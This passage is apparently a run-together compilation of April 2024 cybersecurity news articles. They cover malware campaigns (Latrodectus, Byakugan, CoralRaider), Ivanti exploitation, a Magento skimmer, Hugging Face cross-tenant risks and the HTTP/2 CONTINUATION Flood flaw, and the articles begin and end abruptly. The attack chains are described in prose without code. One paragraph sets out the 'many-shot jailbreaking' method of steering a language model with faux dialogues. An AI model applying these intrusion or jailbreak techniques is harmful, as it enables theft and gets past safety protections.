swiftly developing new variants that are designed to abuse these issues to
breach as many devices as possible.
With network devices becoming common targets for financially motivated and
nation-state-linked attackers, the development comes as Palo Alto Networks Unit
42 revealed that threat actors are increasingly switching to malware-initiated
scanning attacks to flag vulnerabilities in target networks.
"Some scanning attacks originate from benign networks likely driven by malware
on infected machines," the company said.
"By launching scanning attacks from compromised hosts, attackers can accomplish
the following: Covering their traces, bypassing geofencing, expanding botnets,
[and] leveraging the resources of these compromised devices to generate a higher
volume of scanning requests compared to what they could achieve using only their
own devices."
The sandbox, according to V8 security technical lead Samuel Groß, aims to
prevent "memory corruption in V8 from spreading within the host process."
The search behemoth has described V8 Sandbox as a lightweight, in-process
sandbox for the JavaScript and WebAssembly engine that's designed to mitigate
common V8 vulnerabilities.
The idea is to limit the impact of V8 vulnerabilities by restricting the code
executed by V8 to a subset of the process' virtual address space ("the sandbox")
and isolating it from the rest of the process.
Shortcomings affecting V8 have accounted for a significant chunk of the zero-day
vulnerabilities that Google has addressed between 2021 and 2023, with as many as
16 security flaws discovered over the time period.
"The sandbox assumes that an attacker can arbitrarily and concurrently modify
any memory inside the sandbox address space as this primitive can be constructed
from typical V8 vulnerabilities," the Chromium team said.
"Further, it is assumed that an attacker will be able to read memory outside of
the sandbox, for example, through hardware side channels. The sandbox then aims
to protect the rest of the process from such an attacker. As such, any
corruption of memory outside of the sandbox address space is considered a
sandbox violation."
Groß emphasized the challenges with tackling V8 vulnerabilities by switching to
a memory-safe language like Rust or hardware memory safety approaches, such as
memory tagging, given the "subtle logic issues" that can be exploited to corrupt
memory, unlike classic memory safety bugs like use-after-frees, out-of-bounds
accesses, and others.
"Nearly all vulnerabilities found and exploited in V8 today have one thing in
common: the eventual memory corruption necessarily happens inside the V8 heap
because the compiler and runtime (almost) exclusively operate on V8 HeapObject
instances," Groß said.
Given that these issues cannot be protected by the same techniques used for
typical memory-corruption vulnerabilities, the V8 Sandbox is designed to isolate
V8's heap memory such that should any memory corruption occur, it cannot escape
the security confines to other parts of the process' memory.
This is accomplished by replacing all data types that can access out-of-sandbox
memory with "sandbox-compatible" alternatives, thereby effectively preventing an
attacker from accessing other memory. The sandbox can be enabled by setting
"v8_enable_sandbox" to true in the gn args.
Benchmark results from Speedometer and JetStream show that the security feature
adds an overhead of about 1% on typical workloads, allowing it to be enabled by
default starting with Chrome version 123, spanning Android, ChromeOS, Linux,
macOS, and Windows.
"The V8 Sandbox requires a 64-bit system as it needs to reserve a large amount
of virtual address space, currently one terabyte," Groß said.
"The sandbox is motivated by the fact that current memory safety technologies
are largely inapplicable to optimizing JavaScript engines. While these
technologies fail to prevent memory corruption in V8 itself, they can in fact
protect the V8 Sandbox attack surface. The sandbox is therefore a necessary step
towards memory safety."
The development comes as Google highlighted the role by Kernel Address Sanitizer
(KASan) in detecting memory bugs in native code and help harden Android firmware
security, adding it used the compiler-based tool for discovering more than 40
bugs.
"Using KASan enabled builds during testing and/or fuzzing can help catch memory
corruption vulnerabilities and stability issues before they land on user
devices," Eugene Rodionov and Ivan Lozano from the Android team said.
"Latrodectus is an up-and-coming downloader with various sandbox evasion
functionality," researchers from Proofpoint and Team Cymru said in a joint
analysis published last week, adding it's designed to retrieve payloads and
execute arbitrary commands.
There is evidence to suggest that the malware is likely written by the same
threat actors behind the IcedID malware, with the downloader put to use by
initial access brokers (IABs) to facilitate the deployment of other malware.
Latrodectus has been primarily linked to two different IABs tracked by
Proofpoint under the names TA577 (aka Water Curupira) and TA578, the former of
which has also been linked to the distribution of QakBot and PikaBot.
As of mid-January 2024, it's been employed almost exclusively by TA578 in email
threat campaigns, in some cases delivered via a DanaBot infection.
TA578, known to be active since at least May 2020, has been linked to
email-based campaigns delivering Ursnif, IcedID, KPOT Stealer, Buer Loader,
BazaLoader, Cobalt Strike, and Bumblebee.
Attack chains leverage contact forms on websites to send legal threats regarding
alleged copyright infringement to targeted organizations. The links embedded in
the messages direct the recipients to a bogus website to trick them into
downloading a JavaScript file that's responsible for launching the main payload
using msiexec.
"Latrodectus will post encrypted system information to the command-and-control
server (C2) and request the download of the bot," the researchers said. "Once
the bot registers with the C2, it sends requests for commands from the C2."
It also comes with capabilities to detect if it's running in a sandboxed
environment by checking if the host has a valid MAC address and there are at
least 75 running processes on systems running Windows 10 or newer.
Like in the case of IcedID, Latrodectus is designed to send the registration
information in a POST request to the C2 server where the fields are HTTP
parameters stringed together and encrypted, after which it awaits further
instructions from the server.
The commands allow the malware to enumerate files and processes, execute
binaries and DLL files, run arbitrary directives via cmd.exe, update the bot,
and even shut down a running process.
A further examination of the attacker infrastructure reveals that the first C2
servers came alive on September 18, 2023. These servers, in turn, are configured
to communicate with an upstream Tier 2 server that was set up around August
2023.
Latrodectus' connections to IcedID stems from the fact that the T2 server
"maintains connections with backend infrastructure associated with IcedID" and
use of jump boxes previously associated with IcedID operations.
"Latrodectus will become increasingly used by financially motivated threat
actors across the criminal landscape, particularly those who previously
distributed IcedID," Team Cymru assessed.
"The phishing email contained a ZIP file attachment that when extracted reveals
an HTML file that leads to a malicious file download posing as an invoice,"
Trustwave SpiderLabs researcher Karla Agregado said.
The email message, the company said, originates from an email address format
that uses the domain "temporary[.]link" and has Roundcube Webmail listed as the
User-Agent string.
The HTML file points containing a link ("facturasmex[.]cloud") that displays an
error message saying "this account has been suspended," but when visited from an
IP address geolocated to Mexico, loads a CAPTCHA verification page that uses
Cloudflare Turnstile.
This step paves the way for a redirect to another domain from where a malicious
RAR file is downloaded. The RAR archive comes with a PowerShell script that
gathers system metadata as well as checks for the presence of antivirus software
in the compromised machine.
It also incorporates several Base64-encoded strings that are designed to run PHP
scripts to determine the user's country and retrieve a ZIP file from Dropbox
containing "many highly suspicious files."
Trustwave said the campaign exhibits similarities with that of Horabot malware
campaigns that have targeted Spanish-speaking users in Latin America in the
past.
"Understandably, from the threat actors' point of view, phishing campaigns
always try different [approaches] to hide any malicious activity and avoid
immediate detection," Agregado said.
"Using newly created domains and making them accessible only in specific
countries is another evasion technique. especially if the domain behaves
differently depending on their target country."
The development comes as Malwarebytes revealed a malvertising campaign targeting
Microsoft Bing search users with bogus ads for NordVPN that lead to the
distribution of a remote access trojan called SectopRAT (aka ArechClient) hosted
on Dropbox via a phony website ("besthord-vpn[.]com").
"Malvertising continues to show how easy it is to surreptitiously install
malware under the guise of popular software downloads," security researcher
Jérôme Segura said. "Threat actors are able to roll out infrastructure quickly
and easily to bypass many content filters."
It also follows the discovery of a fake Java Access Bridge installer that serves
as a conduit to deploy the open-source XMRig cryptocurrency miner, per
SonicWall.
The network security company said it also discovered a Golang malware that "uses
multiple geographic checks and publicly available packages to screenshot the
system before installing a root certificate to the Windows registry for HTTPS
communications to the [command-and-control server]."
Google Sues App Developers Over Fake Crypto Investment App Scam
8.4.24
Cryptocurrency
The Hacker News Google has filed a lawsuit against
two app developers for engaging in an "international online consumer investment
fraud scheme" that tricked users into downloading bogus Android apps from the
Google Play Store and other sources and stealing their funds under the guise of
promising higher returns.
The individuals in question are Yunfeng Sun (aka Alphonse Sun) and Hongnam
Cheung (aka Zhang Hongnim or Stanford Fischer), who are believed to be based in
Shenzhen and Hong Kong, respectively.
The defendants are said to have uploaded about 87 crypto apps to the Play Store
to pull off the social engineering scam since at least 2019, with over 100,000
users downloading them and leading to substantial financial losses.
"The gains conveyed by the apps were illusory," the tech giant said in its
complaint. "And the scheme did not end there."
"Instead, when individual victims attempted to withdraw their balances,
defendants and their confederates would double down on the scheme by requesting
various fees and other payments from victims that were supposedly necessary for
the victims to recover their principal investments and purported gains."
While this kind of scam is typically referred to as pig butchering (aka shā zhū
pán), Google said it "neither adopts nor endorses the use of this term." It's
derived from the idea that victims are fattened up like hogs with the promise of
lucrative returns before "slaughtering" them for their assets.
In September 2023, the U.S. Financial Crimes Enforcement Network (FinCEN) said
these scams are perpetrated by criminal enterprises based in Southeast Asia that
employ hundreds of thousands of people who are trafficked to the region by
promising them high-paying jobs.
The fraudulent scheme entails the scammers using elaborate fictitious personas
to target unsuspecting individuals via social media or dating platforms,
enticing them with the prospect of a romantic relationship to build trust and
convince them to invest in cryptocurrency portfolios that purport to offer high
profits within a short span of time with an aim to steal their funds.
To create the appearance of legitimacy, the financially motivated actors are
known to fabricate websites and mobile apps to display a bogus investment
portfolio with large returns.
Sun and Cheung, said Google, lured victim investors to download their fraudulent
apps through text messages using Google Voice to target victims in the U.S. and
Canada. Other distribution methods include affiliate marketing campaigns that
offer commissions for "signing up additional users" and YouTube videos promoting
the fake investment platforms.
The company described the malicious activity as persistent and continuing, with
the defendants "using varying computer network infrastructure and accounts to
obfuscate their identities, and making material misrepresentations to Google in
the process."
It also accused them of violating the Racketeer Influenced and Corrupt
Organizations Act (RICO), carrying out wire fraud, and breaching the Google Play
App Signing Terms of Service, Developer Program Policies, YouTube's Community
Guidelines, as well as the Google Voice Acceptable Use Policy.
"Google Play can continue to be an app-distribution platform that users want to
use only if users feel confident in the integrity of the apps," Google added.
"By using Google Play to conduct their fraud scheme, defendants have threatened
the integrity of Google Play and the user experience."
It's worth noting that the problem is not limited to the Android ecosystem
alone, as prior reports show that such bogus apps have also repeatedly made
their way to the Apple App Store.
The development is the latest in a series of legal actions that Google has taken
to avoid the misuse of its products. In November 2023, the company sued multiple
individuals in India and Vietnam for distributing fake versions of its Bard AI
chatbot (now rebranded as Gemini) to propagate malware via Facebook.
The attack leverages CVE-2024-20720 (CVSS score: 9.1), which has been described
by Adobe as a case of "improper neutralization of special elements" that could
pave the way for arbitrary code execution.
It was addressed by the company as part of security updates released on February
13, 2024.
Sansec said it discovered a "cleverly crafted layout template in the database"
that's being used to automatically inject malicious code to execute arbitrary
commands.
"Attackers combine the Magento layout parser with the beberlei/assert package
(installed by default) to execute system commands," the company said.
"Because the layout block is tied to the checkout cart, this command is executed
whenever <store>/checkout/cart is requested."
The command in question is sed, which is used to insert a code execution
backdoor that's then responsible for delivering a Stripe payment skimmer to
capture and exfiltrate financial information to another compromised Magento
store.
The development comes as the Russian government has charged six people for using
skimmer malware to steal credit card and payment information from foreign
e-commerce stores at least since late 2017.
The suspects are Denis Priymachenko, Alexander Aseyev, Alexander Basov, Dmitry
Kolpakov, Vladislav Patyuk, and Anton Tolmachev. Recorded Future News reported
that the arrests were made a year ago, citing court documents.
"As a result, members of the hacker group illegally took possession of
information about almost 160 thousand payment cards of foreign citizens, after
which they sold them through shadow internet sites," the Prosecutor General's
Office of the Russian Federation said.
AI-as-a-Service Providers Vulnerable to PrivEsc and Cross-Tenant Attacks
7.4.24
AI
The Hacker News New research has found that
artificial intelligence (AI)-as-a-service providers such as Hugging Face are
susceptible to two critical risks that could allow threat actors to escalate
privileges, gain cross-tenant access to other customers' models, and even take
over the continuous integration and continuous deployment (CI/CD) pipelines.
"Malicious models represent a major risk to AI systems, especially for
AI-as-a-service providers because potential attackers may leverage these models
to perform cross-tenant attacks," Wiz researchers Shir Tamari and Sagi Tzadik
said.
"The potential impact is devastating, as attackers may be able to access the
millions of private AI models and apps stored within AI-as-a-service providers."
The development comes as machine learning pipelines have emerged as a brand new
supply chain attack vector, with repositories like Hugging Face becoming an
attractive target for staging adversarial attacks designed to glean sensitive
information and access target environments.
The threats are two-pronged, arising as a result of shared inference
infrastructure takeover and shared CI/CD takeover. They make it possible to run
untrusted models uploaded to the service in pickle format and take over the
CI/CD pipeline to perform a supply chain attack.
The findings from the cloud security firm show that it's possible to breach the
service running the custom models by uploading a rogue model and leverage
container escape techniques to break out from its own tenant and compromise the
entire service, effectively enabling threat actors to obtain cross-tenant access
to other customers' models stored and run in Hugging Face.
"Hugging Face will still let the user infer the uploaded Pickle-based model on
the platform's infrastructure, even when deemed dangerous," the researchers
elaborated.
This essentially permits an attacker to craft a PyTorch (Pickle) model with
arbitrary code execution capabilities upon loading and chain it with
misconfigurations in the Amazon Elastic Kubernetes Service (EKS) to obtain
elevated privileges and laterally move within the cluster.
"The secrets we obtained could have had a significant impact on the platform if
they were in the hands of a malicious actor," the researchers said. "Secrets
within shared environments may often lead to cross-tenant access and sensitive
data leakage.
To mitigate the issue, it's recommended to enable IMDSv2 with Hop Limit so as to
prevent pods from accessing the Instance Metadata Service (IMDS) and obtaining
the role of a Node within the cluster.
The research also found that it's possible to achieve remote code execution via
a specially crafted Dockerfile when running an application on the Hugging Face
Spaces service, and use it to pull and push (i.e., overwrite) all the images
that are available on an internal container registry.
Hugging Face, in coordinated disclosure, said it has addressed all the
identified issues. It's also urging users to employ models only from trusted
sources, enable multi-factor authentication (MFA), and refrain from using pickle
files in production environments.
"This research demonstrates that utilizing untrusted AI models (especially
Pickle-based ones) could result in serious security consequences," the
researchers said. "Furthermore, if you intend to let users utilize untrusted AI
models in your environment, it is extremely important to ensure that they are
running in a sandboxed environment."
The disclosure follows another research from Lasso Security that it's possible
for generative AI models like OpenAI ChatGPT and Google Gemini to distribute
malicious (and non-existant) code packages to unsuspecting software developers.
In other words, the idea is to find a recommendation for an unpublished package
and publish a trojanized package in its place in order to propagate the malware.
The phenomenon of AI package hallucinations underscores the need for exercising
caution when relying on large language models (LLMs) for coding solutions.
AI company Anthropic, for its part, has also detailed a new method called
"many-shot jailbreaking" that can be used to bypass safety protections built
into LLMs to produce responses to potentially harmful queries by taking
advantage of the models' context window.
"The ability to input increasingly-large amounts of information has obvious
advantages for LLM users, but it also comes with risks: vulnerabilities to
jailbreaks that exploit the longer context window," the company said earlier
this week.
The technique, in a nutshell, involves introducing a large number of faux
dialogues between a human and an AI assistant within a single prompt for the LLM
in an attempt to "steer model behavior" and respond to queries that it wouldn't
otherwise (e.g., "How do I build a bomb?").
Bogus installers for Adobe Acrobat Reader are being used to distribute a new
multi-functional malware dubbed Byakugan.
The starting point of the attack is a PDF file written in Portuguese that, when
opened, shows a blurred image and asks the victim to click on a link to download
the Reader application to view the content.
According to Fortinet FortiGuard Labs, clicking the URL leads to the delivery of
an installer ("Reader_Install_Setup.exe") that activates the infection sequence.
Details of the campaign were first disclosed by the AhnLab Security Intelligence
Center (ASEC) last month.
The attack chain leverages techniques like DLL hijacking and Windows User Access
Control (UAC) bypass to load a malicious dynamic-link library (DLL) file named
"BluetoothDiagnosticUtil.dll," which, in turn, loads unleashes the final
payload. It also deploys a legitimate installer for a PDF reader like
Wondershare PDFelement.
The binary is equipped to gather and exfiltrate system metadata to a
command-and-control (C2) server and drop the main module ("chrome.exe") from a
different server that also acts as its C2 for receiving files and commands.
"Byakugan is a node.js-based malware packed into its executable by pkg,"
security researcher Pei Han Liao said. "In addition to the main script, there
are several libraries corresponding to features."
This includes setting up persistence, monitoring the victim's desktop using OBS
Studio, capturing screenshots, downloading cryptocurrency miners, logging
keystrokes, enumerating and uploading files, and grabbing data stored in web
browsers.
"There is a growing trend to use both clean and malicious components in malware,
and Byakugan is no exception," Fortinet said. "This approach increases the
amount of noise generated during analysis, making accurate detections more
difficult."
The disclosure comes as ASEC revealed a new campaign that propagates the
Rhadamanthys information stealer under the guise of an installer for groupware.
"The threat actor created a fake website to resemble the original website and
exposed the site to the users using the ad feature in search engines," the South
Korean cybersecurity firm said. "The malware in distribution uses the indirect
syscall technique to hide from the eyes of security solutions."
It also follows a discovery that a manipulated version of Notepad++ is being
employed by unidentified threat actors to propagate the WikiLoader malware (aka
WailingCrab).
"JSOutProx is a sophisticated attack framework utilizing both JavaScript and
.NET," Resecurity said in a technical report published this week.
"It employs the .NET (de)serialization feature to interact with a core
JavaScript module running on the victim's machine. Once executed, the malware
enables the framework to load various plugins, which conduct additional
malicious activities on the target."
First identified in December 2019 by Yoroi, early attacks distributing JSOutProx
have been attributed to a threat actor tracked as Solar Spider. The operations
track record of striking banks and other big companies in Asia and Europe.
In late 2021, Quick Heal Security Labs detailed attacks leveraging the remote
access trojan (RAT) to single out employees of small finance banks from India.
Other campaign waves have taken aim at Indian government establishments as far
back as April 2020.
Attack chains are known to leverage spear-phishing emails bearing malicious
JavaScript attachments masquerading as PDFs and ZIP archives containing rogue
HTA files to deploy the heavily obfuscated implant.
"This malware has various plugins to perform various operations such as
exfiltration of data, performing file system operations," Quick Heal noted [PDF]
at the time. "Apart from that, it also has various methods with offensive
capabilities that perform various operations."
The plugins allow it to harvest a wide range of information from the compromised
host, control proxy settings, capture clipboard content, access Microsoft
Outlook account details, and gather one-time passwords from Symantec VIP. A
unique feature of the malware is its use of the Cookie header field for
command-and-control (C2) communications.
JSOutProx also stands for the fact that it's a fully functional RAT implemented
in JavaScript.
"JavaScript simply does not offer as much flexibility as a PE file does,"
Fortinet FortiGuard Labs said in a report released in December 2020, describing
a campaign directed against governmental monetary and financial sectors in Asia.
"However, as JavaScript is used by many websites, it appears to most users as
benign, as individuals with basic security knowledge are taught to avoid opening
attachments that end in .exe. Also, because JavaScript code can be obfuscated,
it easily bypasses antivirus detection, allowing it to filter through
undetected."
The latest set of attacks documented by Resecurity entails using fake SWIFT or
MoneyGram payment notifications to trick email recipients into executing the
malicious code. The activity is said to have witnessed a spike starting February
8, 2024.
The artifacts have been observed hosted on GitHub and GitLab repositories, which
have since been blocked and taken down.
"Once the malicious code has been successfully delivered, the actor removes the
repository and creates a new one," the cybersecurity company said. "This tactic
is likely related to the actor uses to manage multiple malicious payloads and
differentiate targets."
The exact origins of the e-crime group behind the malware are presently unknown,
although the victimology distribution of the attacks and the sophistication of
the implant alludes to them originating from China or affiliated with it,
Resecurity posited.
The development comes as cyber criminals are promoting on the dark web new
software called GEOBOX that repurposes Raspberry Pi devices for conducting fraud
and anonymization.
Offered for only $80 per month (or $700 for a lifetime license), the tool allows
the operators to spoof GPS locations, emulate specific network and software
settings, mimic settings of known Wi-Fi access points, as well as bypass
anti-fraud filters.
Such tools could have serious security implications as they open the door to a
broad spectrum of crimes like state-sponsored attacks, corporate espionage, dark
web market operations, financial fraud, anonymous distribution of malware, and
even access to geofenced content.
"The ease of access to GEOBOX raises significant concerns within the
cybersecurity community about its potential for widespread adoption among
various threat actors," Resecurity said.
The clusters are being tracked by Mandiant under the monikers UNC5221, UNC5266,
UNC5291, UNC5325, UNC5330, and UNC5337. Another group linked to the exploitation
spree is UNC3886.
The Google Cloud subsidiary said it has also observed financially motivated
actors exploiting CVE-2023-46805 and CVE-2024-21887, likely in an attempt to
conduct cryptocurrency mining operations.
"UNC5266 overlaps in part with UNC3569, a China-nexus espionage actor that has
been observed exploiting vulnerabilities in Aspera Faspex, Microsoft Exchange,
and Oracle Web Applications Desktop Integrator, among others, to gain initial
access to target environments," Mandiant researchers said.
The threat actor has been linked to post-exploitation activity leading to the
deployment of the Sliver command-and-control (C2) framework, a variant of the
WARPWIRE credential stealer, and a new Go-based backdoor dubbed TERRIBLETEA that
comes with command execution, keylogging, port scanning, file system
interaction, and screen capturing functions.
UNC5330, which has been observed combining CVE-2024-21893 and CVE-2024-21887 to
breach Ivanti Connect Secure VPN appliances at least since February 2024, has
leveraged custom malware such as TONERJAM and PHANTOMNET for facilitating
post-compromise actions -
PHANTOMNET - A modular backdoor that communicates using a custom communication
protocol over TCP and employs a plugin-based system to download and execute
additional payloads TONERJAM - A launcher that's designed to decrypt and
execute PHANTOMNET Besides using Windows Management Instrumentation (WMI) to
perform reconnaissance, move laterally, manipulate registry entries, and
establish persistence, UNC5330 is known to compromise LDAP bind accounts
configured on the infected devices in order to domain admin access.
Another notable China-linked espionage actor is UNC5337, which is said to have
infiltrated Ivanti devices as early as January 2024 using CVE-2023-46805 and
CVE-2024 to deliver a custom malware toolset known as SPAWN that comprises four
distinct components that work in tandem to function as a stealthy and persistent
backdoor -
SPAWNSNAIL - A passive backdoor that listens on localhost and is equipped to
launch an interactive bash shell as well as launch SPAWNSLOTH SPAWNMOLE - A
tunneler utility that's capable of directing malicious traffic to a specific
host while passing benign traffic unmodified to the Connect Secure web server
SPAWNANT - An installer that's responsible for ensuring the persistence of
SPAWNMOLE and SPAWNSNAIL by taking advantage of a coreboot installer function
SPAWNSLOTH - A log tampering program that disables logging and log forwarding to
an external syslog server when the SPAWNSNAIL implant is running Mandiant has
assessed with medium confidence that UNC5337 and UNC5221 are one and the same
threat group, noting the SPAWN tool is "designed to enable long-term access and
avoid detection."
UNC5221, which was previously attributed to web shells such as BUSHWALK,
CHAINLINE, FRAMESTING, and LIGHTWIRE, has also unleashed a Perl-based web shell
referred to as ROOTROT that's embedded into a legitimate Connect Secure .ttc
file located at "/data/runtime/tmp/tt/setcookie.thtml.ttc" by exploiting
CVE-2023-46805 and CVE-2024-21887.
A successful deployment of the web shell is followed by network reconnaissance
and lateral movement, in some cases, resulting in the compromise of a vCenter
server in the victim network by means of a Golang backdoor called BRICKSTORM.
"BRICKSTORM is a Go backdoor targeting VMware vCenter servers," Mandiant
researchers explained. "It supports the ability to set itself up as a web
server, perform file system and directory manipulation, perform file operations
such as upload/download, run shell commands, and perform SOCKS relaying."
The last among the five China-based groups tied to the abuse of Ivanti security
flaws is UNC5291, which Mandiant said likely has associations with another
hacking group UNC3236 (aka Volt Typhoon), primarily owing to its targeting of
academic, energy, defense, and health sectors.
"Activity for this cluster started in December 2023 focusing on Citrix Netscaler
ADC and then shifted to focus on Ivanti Connect Secure devices after details
were made public in mid-Jan. 2024," the company said.
The findings once again underscore the threat faced by edge appliances, with the
espionage actors utilizing a combination of zero-day flaws, open-source tooling,
and custom backdoors to tailor their tradecraft depending on their targets to
evade detection for extended periods of time.
Cisco Talos is tracking the cluster under the name CoralRaider, describing it as
financially motivated. Targets of the campaign include India, China, South
Korea, Bangladesh, Pakistan, Indonesia, and Vietnam.
"This group focuses on stealing victims' credentials, financial data, and social
media accounts, including business and advertisement accounts," security
researchers Chetan Raghuprasad and Joey Chen said. "They use RotBot, a
customized variant of Quasar RAT, and XClient stealer as payloads."
Other commodity malware used by the group comprises a combination of remote
access trojans and information stealers such as AsyncRAT, NetSupport RAT, and
Rhadamanthys.
The targeting of business and advertisement accounts has been of particular
focus for attackers operating out of Vietnam, with various stealer malware
families like Ducktail, NodeStealer, and VietCredCare deployed to take control
of the accounts for further monetization.
The modus operandi entails the use of Telegram to exfiltrate the stolen
information from victim machines, which is then traded in underground markets to
generate illicit revenues.
"CoralRaider operators are based in Vietnam, based on the actor messages in
their Telegram C2 bot channels and language preference in naming their bots, PDB
strings, and other Vietnamese words hard-coded in their payload binaries," the
researchers said.
Attack chains start with a Windows shortcut file (LNK), although there is
currently no clear explanation as to how these files are distributed to the
targets.
Should the LNK file be opened, an HTML application (HTA) file is downloaded and
executed from an attacker-controlled download server, which, in turn, runs an
embedded Visual Basic script.
The script, for its part, decrypts and sequentially executes three other
PowerShell scripts that are responsible for performing anti-VM and anti-analysis
checks, circumventing Windows User Access Control (UAC), disabling Windows and
application notifications, and downloading and running RotBot.
RotBot is configured to contact a Telegram bot and retrieve the XClient stealer
malware and execute it in memory, ultimately facilitating the theft of cookies,
credentials, and financial information from web browsers like Brave, Cốc Cốc,
Google Chrome, Microsoft Edge, Mozilla Firefox, and Opera; Discord and Telegram
data; and screenshots.
XClient is also engineered to siphon data from victims' Facebook, Instagram,
TikTok and YouTube accounts, gathering details about the payment methods and
permissions associated with their Facebook business and ads accounts.
"RotBot is a variant of the Quasar RAT client that the threat actor has
customized and compiled for this campaign," the researchers said. "[XClient] has
extensive information-stealing capability through its plugin module and various
modules for performing remote administrative tasks."
The development comes as Bitdefender disclosed details of a malvertising
campaign on Facebook that's taking advantage of the buzz surrounding generative
AI tools to push an assortment of information stealers like Rilide, Vidar,
IceRAT, and a new entrant known as Nova Stealer.
The starting point of the attack is the threat actor taking over an existing
Facebook account and modifying its appearance to mimic well-known AI tools from
Google, OpenAI, and Midjourney, and expanding their reach by running sponsored
ads on the platform.
One such imposter page masquerading as Midjourney had 1.2 million followers
before it was taken down on March 8, 2023. The threat actors managing the page
were mainly from Vietnam, the U.S., Indonesia, the U.K., and Australia, among
others.
"The malvertising campaigns have tremendous reach through Meta's sponsored ad
system and have actively been targeting European users from Germany, Poland,
Italy, France, Belgium, Spain, the Netherlands, Romania, Sweden, and elsewhere,"
the Romanian cybersecurity company said.
"The phishing emails use a unique vehicle incident lure and, in later stages of
the infection chain, spoof the Federal Bureau of Transportation in a PDF that
mentions a significant fine for the incident," Cofense researcher Dylan Duncan
said.
The email message comes with a malicious link that leverages an open redirect
flaw to take the recipients to a link hosting a supposed PDF document, but, in
reality, is an image that, upon clicking, downloads a ZIP archive with the
stealer payload.
Written in C++, Rhadamanthys is designed to establish connections with a
command-and-control (C2) server in order to harvest sensitive data from the
compromised hosts.
"This campaign appeared within days of the law enforcement takedown of the
LockBit ransomware group," Duncan said. "While this could be a coincidence,
Trend Micro revealed in August 2023 a Rhadamanthys variant that came bundled
with a leaked LockBit payload, alongside a clipper malware and cryptocurrency
miner.
"The threat actors added a combination of an information stealer and a LockBit
ransomware variant in a single Rhadamanthys bundle, possibly indicating the
continued evolution of the malware," the company noted.
The development comes amid a steady stream of new stealer malware families like
Sync-Scheduler and Mighty Stealer, even as existing strains like StrelaStealer
are evolving with improved obfuscation and anti-analysis techniques.
It also follows the emergence of a malspam campaign targeting Indonesia that
employs banking-related lures to propagate the Agent Tesla malware to plunder
sensitive information such as login credentials, financial data, and personal
documents.
Agent Tesla phishing campaigns observed in November 2023 have also set their
sights on Australia and the U.S., according to Check Point, which attributed the
operations to two African-origin threat actors tracked as Bignosa (aka Nosakhare
Godson and Andrei Ivan) and Gods (aka GODINHO or Kmarshal or Kingsley Fredrick),
the latter of whom works as a web designer.
"The main actor [Bignosa] appears to be a part of a group operating malware and
phishing campaigns, targeting organizations, which is testified by the US and
Australian email business databases, as well as individuals," the Israeli
cybersecurity company said.
The Agent Tesla malware distributed via these attack chains have been found to
be secured by the Cassandra Protector, which helps protect software programs
against reverse-engineering or modification efforts. The messages are sent via
an open-source webmail tool called RoundCube.
"As seen from the description of these threat actors' actions, no rocket science
degree is required to conduct the cyber crime operations behind one of the most
prevalent malware families in the last several years," Check Point said.
"It's an unfortunate course of events caused by the low-entry level threshold so
that anyone willing to provoke victims to launch the malware via spam campaigns
can do so."
The technique has been codenamed HTTP/2 CONTINUATION Flood by security
researcher Bartek Nowotarski, who reported the issue to the CERT Coordination
Center (CERT/CC) on January 25, 2024.
"Many HTTP/2 implementations do not properly limit or sanitize the amount of
CONTINUATION frames sent within a single stream," CERT/CC said in an advisory on
April 3, 2024.
"An attacker that can send packets to a target server can send a stream of
CONTINUATION frames that will not be appended to the header list in memory but
will still be processed and decoded by the server or will be appended to the
header list, causing an out of memory (OOM) crash."
Like in HTTP/1, HTTP/2 uses header fields within requests and responses. These
header fields can comprise header lists, which in turn, are serialized and
broken into header blocks. The header blocks are then divided into block
fragments and transmitted within HEADER or what's called CONTINUATION frames.
"The CONTINUATION frame (type=0x9) is used to continue a sequence of header
block fragments," the documentation for RFC 7540 reads.
"Any number of CONTINUATION frames can be sent, as long as the preceding frame
is on the same stream and is a HEADERS, PUSH_PROMISE, or CONTINUATION frame
without the END_HEADERS flag set."
The last frame containing headers will have the END_HEADERS flag set, which
signals the remote endpoint that it's the end of the header block.
According to Nowotarski, CONTINUATION Flood is a class of vulnerabilities within
several HTTP/2 protocol implementations that pose a more severe threat compared
to the Rapid Reset attack that came to light in October 2023.
"A single machine (and in certain instances, a mere single TCP connection or a
handful of frames) has the potential to disrupt server availability, with
consequences ranging from server crashes to substantial performance
degradation," the researcher said. "Remarkably, requests that constitute an
attack are not visible in HTTP access logs."
The vulnerability, at its core, has to do with incorrect handling of HEADERS and
multiple CONTINUATION frames that pave the way for a DoS condition.
In other words, an attacker can initiate a new HTTP/2 stream against a target
server using a vulnerable implementation and send HEADERS and CONTINUATION
frames with no set END_HEADERS flag, creating a never-ending stream of headers
that the HTTP/2 server would need to parse and store in memory.
While the exact outcome varies depending on the implementation, impacts range
from instant crash after sending a couple of HTTP/2 frames and out of memory
crash to CPU exhaustion, thereby affecting server availability.
"RFC 9113 [...] mentions multiple security issues that may arise if CONTINUATION
frames are not handled correctly," Nowotarski said.
"At the same time, it does not mention a specific case in which CONTINUATION
frames are sent without the final END_HEADERS flag which can have repercussions
on affected servers."
The issue impacts several projects such as amphp/http (CVE-2024-2653), Apache
HTTP Server (CVE-2024-27316), Apache Tomcat (CVE-2024-24549), Apache Traffic
Server (CVE-2024-31309), Envoy proxy (CVE-2024-27919 and CVE-2024-30255), Golang
(CVE-2023-45288), h2 Rust crate, nghttp2 (CVE-2024-28182), Node.js
(CVE-2024-27983), and Tempesta FW (CVE-2024-2758).
Users are recommended to upgrade affected software to the latest version to
mitigate potential threats. In the absence of a fix, it's advised to consider
temporarily disabling HTTP/2 on the server.
CVE-2024-21894 (CVSS score: 8.2) - A heap overflow vulnerability in the IPSec
component of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure allows
an unauthenticated malicious user to send specially crafted requests in order to
crash the service thereby causing a DoS attack. In certain conditions, this may
lead to execution of arbitrary code. CVE-2024-22052 (CVSS score: 7.5) - A
null pointer dereference vulnerability in IPSec component of Ivanti Connect
Secure (9.x, 22.x) and Ivanti Policy Secure allows an unauthenticated malicious
user to send specially crafted requests in order to crash the service thereby
causing a DoS attack. CVE-2024-22053 (CVSS score: 8.2) - A heap overflow
vulnerability in the IPSec component of Ivanti Connect Secure (9.x, 22.x) and
Ivanti Policy Secure allows an unauthenticated malicious user to send specially
crafted requests in order to crash the service thereby causing a DoS attack or
in certain conditions read contents from memory. CVE-2024-22023 (CVSS score:
5.3) - An XML entity expansion or XEE vulnerability in SAML component of Ivanti
Connect Secure (9.x, 22.x) and Ivanti Policy Secure allows an unauthenticated
attacker to send specially crafted XML requests in order to temporarily cause
resource exhaustion thereby resulting in a limited-time DoS. The company,
which has been grappling with a steady stream of security flaws in its products
since the start of the year, said it's not aware of "any customers being
exploited by these vulnerabilities at the time of disclosure."
